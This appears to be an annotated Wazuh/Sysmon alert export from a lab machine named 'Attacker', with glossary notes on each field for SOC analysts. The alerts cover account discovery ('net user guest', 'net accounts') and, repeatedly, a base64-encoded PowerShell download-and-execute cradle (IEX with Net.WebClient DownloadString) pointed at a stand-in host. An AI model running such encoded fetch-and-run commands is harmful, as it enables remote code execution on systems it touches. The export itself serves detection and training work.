No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcca-680a-be0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4344
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.118+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.118+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1033317
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.7314204Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282317
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.726 ProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00} ProcessId: 2332 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.726
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-c10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.092+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.092+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1038550
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:58.9771958Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282377
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:53.808 ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} ProcessId: 2176 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} ParentProcessId: 9592 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:53.808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc9-680a-b70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2176
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc6-680a-b30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.173+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.173+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1046613
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:59.5779531Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282382
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:59.551 ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} ProcessId: 2176 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_24a1orhe.2h5.ps1 CreationUtcTime: 2025-04-24 22:35:59.551 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:59.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc9-680a-b70a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2176
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_24a1orhe.2h5.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:59.551
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.906+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.906+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1049378
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:01.8631189Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282423
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:00.700 ProcessGuid: {94294ddc-bcd0-680a-c60a-000000000e00} ProcessId: 12264 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} ParentProcessId: 2176 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:00.700
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcd0-680a-c60a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12264
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

